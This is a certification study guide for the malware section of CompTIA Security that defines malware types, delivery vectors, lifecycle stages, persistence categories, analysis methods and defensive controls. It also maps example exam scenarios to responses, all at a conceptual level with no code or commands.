Navigation

How Can We Help?

CompTIA Security – Section 6 Malware

Created On
Last Updated On
byeditor
Print
You are here:
< All Topics





Section 6: Malware Study Guide


Section 6: Malware Study Guide

1. Scope and Definition

Malware: Malicious software designed to disrupt, damage, or gain unauthorized access to systems, networks, or data. Includes viruses, worms, Trojans, ransomware, spyware, adware, rootkits, bots, logic bombs, etc.

Purpose of Study:

  • Understand precise definitions and distinguishing characteristics of malware types.
  • Recognize delivery vectors and infection methods.
  • Comprehend malware lifecycle and persistence mechanisms.
  • Know analysis, detection, and mitigation strategies.
  • Prepare to identify malware type, appropriate controls, and response steps in scenarios.

2. Classification of Malware

Classify malware by behavior, propagation, payload, and intent. Precise distinctions are critical.

2.1 By Propagation Method

  • Virus: Self-replicating code attaching to host files or programs; requires user or system action to propagate.
  • Worm: Standalone self-replicating code that propagates across networks autonomously, often exploiting vulnerabilities.
  • Trojan: Disguised as legitimate software; does not self-replicate but delivers payload when executed.
  • Bot / Botnet Agent: Infects host and connects to command-and-control infrastructure for remote control.
  • Logic Bomb: Code triggered by specific conditions or date/time; lies dormant until activation.
  • Dropper / Downloader: Initial malware that downloads or drops the main payload onto the system.
  • Ransomware: Encrypts or restricts access to data/systems and demands payment for restoration.
  • Spyware / Adware: Collects information covertly or displays unwanted advertisements.
  • Rootkit: Gains and hides privileged access, concealing malicious components at low system levels.
  • Fileless Malware: Resides in memory or uses legitimate tools (living-off-the-land), evading file-based detection.
  • Polymorphic and Metamorphic Malware: Alters code to evade signature detection; polymorphic changes via encryption/obfuscation, metamorphic rewrites code structure.
  • Advanced Persistent Threat (APT) Tools: Custom, stealthy malware used by well-funded actors for long-term presence.

2.2 By Payload and Intent

  • Destructive Payload: Deletes or corrupts data (e.g., wipers).
  • Stealth/Spy Payload: Gathers credentials, keystrokes, screenshots.
  • Resource Abuse: Cryptojacking, botnet participation for DDoS.
  • Extortion: Ransomware encrypting files or denying service.
  • Backdoor Installation: Provides remote access for follow-up actions.
  • Credential Theft: Harvests credentials for lateral movement.
  • Reconnaissance: Gathers system or network information.
  • Evasion/Anti-Analysis: Techniques to detect or avoid sandbox/analysis environments.

3. Delivery Vectors and Infection Methods

Understanding delivery vectors informs prevention and detection strategies.

3.1 Common Delivery Vectors

  • Email Attachments / Phishing Links: Malware-laden attachments or links. Defense: email filtering, sandboxing, user training, disable macros.
  • Drive-by Downloads / Malicious Websites: Exploits in browsers/plugins. Defense: web filtering, patch management, browser isolation.
  • Removable Media: USB drives carrying malware. Defense: disable autorun, scan removable media.
  • Network Exploits: Worms exploiting unpatched vulnerabilities. Defense: patch management, segmentation, IPS.
  • Software Supply Chain: Compromised software or libraries. Defense: verify code integrity, secure build processes, vendor risk management.
  • Social Engineering / User Interaction: Trick user to execute malware. Defense: awareness training, application allowlisting.
  • Remote Desktop / RDP Exploitation: Brute-force or vulnerability-based delivery. Defense: limit exposure, MFA, monitor access.
  • Malicious Advertisements (Malvertising): Ads delivering exploits or redirects. Defense: ad-blocking, filtering, sandbox analysis.
  • Insider or Physical Access: Authorized individuals installing malware. Defense: strict access controls, activity monitoring, segregation of duties.
  • Fileless Techniques: Use of PowerShell, WMI, macros to execute in memory. Defense: application control, EDR behavior monitoring.

3.2 Infection Sequence

  1. Reconnaissance: Attacker identifies target and vector.
  2. Delivery: Malware delivered via vector.
  3. Exploitation: Code executes via vulnerability or user action.
  4. Installation: Persistent component or in-memory foothold established.
  5. Command and Control: Host communicates with attacker infrastructure.
  6. Actions on Objectives: Data theft, lateral movement, payload deployment, encryption, sabotage.
  7. Persistence and Evasion: Techniques to avoid detection (rootkits, fileless, obfuscation).

4. Malware Analysis and Detection Techniques

Distinguish static, dynamic, memory, and network-based analysis; adopt a skeptical mindset.

4.1 Static Analysis

  • Definition: Examination without execution.
  • Techniques:
    • Signature-Based Detection: Known patterns/hashes; limited against unknown or obfuscated malware.
    • File Attribute Inspection: Metadata, PE headers, imports, packers.
    • Disassembly/Decompilation: Conceptual understanding of tools like IDA Pro, Ghidra.
    • YARA Rules: Pattern matching for malware families.
  • Precautions: Combine with dynamic analysis; static alone is insufficient.

4.2 Dynamic Analysis (Behavioral / Sandbox)

  • Definition: Execute in controlled environment to observe behavior.
  • Techniques:
    • Sandbox Execution: Monitor file system, registry, network connections, processes.
    • Behavior Monitoring: API/system call tracking.
    • Network Traffic Analysis: Observe C2 communications, DNS queries.
  • Precautions: Malware may detect sandbox; require advanced or manual analysis.

4.3 Memory Analysis

  • Definition: Inspect memory dump for in-memory malware or rootkits.
  • Tools: Volatility for memory forensics.
  • Use Cases: Fileless malware detection, hidden processes.
  • Skeptical Note: Memory artifacts reveal stealthy threats; requires expertise.

4.4 Network-Based Detection

  • Definition: Monitor traffic for malware indicators.
  • Techniques:
    • Signature-Based IDS/IPS: Known malicious patterns.
    • Anomaly-Based Detection: Unusual traffic patterns, beaconing.
    • DNS Monitoring: Suspicious domains, fast-flux detection.
    • TLS Inspection: Inspect encrypted traffic where permitted.
  • Limitations: Encrypted or obfuscated traffic may evade detection; integrate endpoint and threat intelligence.

4.5 Endpoint Detection and Response (EDR)

  • Definition: Agents capturing telemetry enabling rapid malware detection.
  • Capabilities:
    • Behavioral detection: Suspicious processes, persistence modifications.
    • Automated containment or quarantine.
    • Forensic data collection.
  • Note: Essential for detecting fileless and advanced threats.

4.6 Threat Intelligence Integration

  • Definition: Use IOCs and TTPs to inform detection and investigations.
  • Application: Block known malicious IPs/domains; correlate behavior with known campaigns; prioritize alerts.

5. Prevention and Mitigation Controls

Select controls aligned with malware types and vectors; maintain defense-in-depth.

5.1 Preventive Controls

  • Patch Management: Timely updates to close exploited vulnerabilities.
  • Application Allowlisting: Permit only approved executables and scripts.
  • Email/Web Filtering: Inspect attachments/URLs; sandbox suspicious content.
  • Endpoint Hardening: Disable unused services; restrict privileges; secure configurations.
  • User Training: Educate to recognize phishing; discourage risky actions.
  • Network Segmentation: Contain spread of malware.
  • Least Privilege: Limit user privileges to reduce impact.
  • Secure Development: Code signing and dependency vetting.
  • Device Control: Restrict removable media usage.
  • RASP: Detect/block malicious behavior in applications.

5.2 Detective Controls

  • Antivirus/Anti-malware: Signature and heuristic scanning; updated signatures; recognize limitations.
  • EDR/Endpoint Monitoring: Behavioral alerts; automated containment.
  • IDS/IPS: Network detection/blocking.
  • SIEM Correlation: Aggregate logs to detect infection patterns.
  • File Integrity Monitoring: Detect unauthorized changes.
  • UEBA: Detect anomalies indicating malware-driven actions.
  • Network Traffic Analysis: Monitor beaconing or unusual flows.

5.3 Corrective and Containment Controls

  • Quarantine/Isolation: Isolate infected hosts via EDR or network controls.
  • Patch/Remediate Vulnerabilities: Address vectors identified.
  • Malware Removal Tools: Updated anti-malware; manual removal with forensic guidance.
  • System Restoration: Restore from clean backups if damage irreversible.
  • Credential Reset: Reset compromised credentials.
  • Network Reconfiguration: Block malicious IPs/domains; adjust firewall rules.
  • Forensic Investigation: Memory and disk analysis to identify persistence mechanisms.
  • Post-Incident Hardening: Update controls based on root cause analysis.

5.4 Recovery and Lessons Learned

  • Backup and Recovery Strategy: Regular immutable backups; test restoration.
  • Incident Documentation: Record timeline, analysis, actions, residual risks.
  • Process Improvement: Update patch cadence, training, detection rules based on lessons.
  • Threat Intelligence Feedback Loop: Share indicators for proactive defense.

6. Malware Lifecycle and Persistence Techniques

Lifecycle stages and persistence mechanisms aid detection and removal.

6.1 Typical Malware Lifecycle

  1. Initial Access: Delivery and execution.
  2. Establish Foothold: Persistent or in-memory foothold established.
  3. Command and Control: Communication with attacker infrastructure.
  4. Lateral Movement: Spread or privilege escalation.
  5. Data Collection/Exfiltration: Gather/exfiltrate data.
  6. Maintenance and Evasion: Use rootkits, fileless techniques.
  7. Action on Objectives: Encryption, destruction, sabotage.
  8. Cleanup/Dormancy: Remove traces or dormancy for reactivation.

6.2 Common Persistence Mechanisms

  • Registry Run Keys
  • Scheduled Tasks / Cron Jobs
  • Services / Daemons
  • DLL Injection / Hooking
  • Bootkits / Rootkits
  • WMI-Based Persistence
  • Macro-Based Persistence
  • Startup Folders / Login Scripts
  • Hidden Files or ADS
  • Firmware/BIOS Infection
  • Living-Off-The-Land Binaries

7. Common Indicators of Malware Infection

  • Performance Degradation
  • Unusual Network Traffic
  • Unexpected Files or Processes
  • Registry Changes
  • Alerts from Security Tools
  • Log Anomalies
  • User Complaints
  • System Crashes or Instability
  • Disabled Security Controls
  • Suspicious Persistence Artifacts

8. Analysis Tools and Environments

  • Static Analysis Tools: YARA, strings, PE inspection.
  • Sandbox Environments: Controlled VMs.
  • Network Monitoring Tools: Wireshark, Zeek/Bro.
  • Memory Forensics Tools: Volatility.
  • Endpoint Forensics: File system, registry, event logs.
  • EDR Platforms
  • Threat Intelligence Platforms
  • Secure Lab Practices: Isolated, snapshot-capable environments.

9. Common Pitfalls and Misconceptions

  • Relying solely on signature-based detection.
  • Underestimating fileless or living-off-the-land techniques.
  • Assuming obvious symptoms indicate infection.
  • Neglecting network indicators.
  • Overlooking persistence artifacts.
  • Inadequate lab setup.
  • False confidence in automated sandboxes.
  • Ignoring user behavior.
  • Skipping post-incident lessons learned.
  • Misreading exam scenario clues.

10. Sample Scenario Mapping

10.1 Rapid Spread via Vulnerability

  • Description: Multiple hosts show identical unusual processes; exploit attempts observed.
  • Type: Worm.
  • Detection: IDS/IPS signatures, endpoint logs, memory forensics.
  • Response: Isolate hosts, patch systems, quarantine, strengthen patch management.

10.2 Email Macro Trojan

  • Description: User enables macros in malicious document; downloads payload.
  • Type: Trojan via macro.
  • Detection: Email logs, sandbox, EDR alerts on Office process behavior.
  • Response: Disable macros, quarantine host, update filters, train users.

10.3 Fileless Persistence via PowerShell

  • Description: Malware executes in memory via PowerShell; periodic beaconing.
  • Type: Fileless malware.
  • Detection: Monitor PowerShell logs, memory analysis, network beacon detection.
  • Response: Restrict PowerShell, use EDR, isolate host, forensic capture.

10.4 Ransomware Encryption Incident

  • Description: Data encrypted, ransom note displayed; backups compromised or outdated.
  • Type: Ransomware.
  • Detection: Endpoint logs, network C2 detection, backup verification.
  • Response: Isolate systems, restore from immutable backups, reset credentials, block C2, update backup strategy.

11. Exam Focus Points

  • Differentiate malware types (virus, worm, Trojan, ransomware, rootkit, fileless).
  • Identify delivery vectors in scenarios.
  • Understand lifecycle and persistence mechanisms.
  • Know detection methods: static, dynamic, memory, network-based.
  • Align controls to malware types and vectors.
  • Appreciate limitations of signature-based detection.
  • Recognize behavioral indicators and advanced techniques.
  • Interpret exam clues precisely for malware identification.
  • Emphasize preventive strategies: patching, allowlisting, training, segmentation.
  • Document response and recovery procedures, including backups and lessons learned.
  • Integrate threat intelligence for informed detection and response.

12. Revision and Study Techniques

  • Create classification tables and flashcards for malware characteristics and controls.
  • Practice scenario-based questions identifying malware type and response.
  • Review sandbox and EDR behavior concepts in a safe lab context.
  • Understand memory forensics role conceptually.
  • Review beaconing detection concepts for network analysis.
  • Examine incident response playbooks for malware incidents.
  • Use spaced repetition and formal documentation of study notes.
  • Perform Topic Audits on past errors related to malware topics.

13. Sample Topic Audit Entries

  • Distinguishing virus vs. worm: Flashcards and scenario practice to reinforce autonomy clue.
  • Fileless detection: Review EDR and behavior-based methods; scenario questions.
  • Persistence mechanisms: Review registry, scheduled tasks, LoLBins; identify in scenarios.
  • Ransomware backup strategy: Study offline/immutable backups; practice scenario-based planning.

14. Formal Tone Reminder

Document notes with precise terminology; treat study notes like formal incident reports: clear, evidence-based, action-oriented.

15. Dry Reality Check

“Malware evolves constantly; signature-based defenses alone are insufficient. Assume adversary employs stealth techniques. Train to spot subtle indicators, apply layered defenses, and verify eradication via forensic rigor. Superficial understanding will fail both exams and real operations.”

16. Next Steps

  • List misidentified malware topics for Topic Audit.
  • Create classification tables and flashcards.
  • Schedule focused study sessions with spaced repetition.
  • Practice scenario-based malware questions.
  • Review and validate until mastery; integrate into full mock exam preparation.

Use this guide to structure revision of Section 6: Malware. Maintain formal documentation and a skeptical, disciplined approach for deep understanding. Good luck.


Tags:
Table of Contents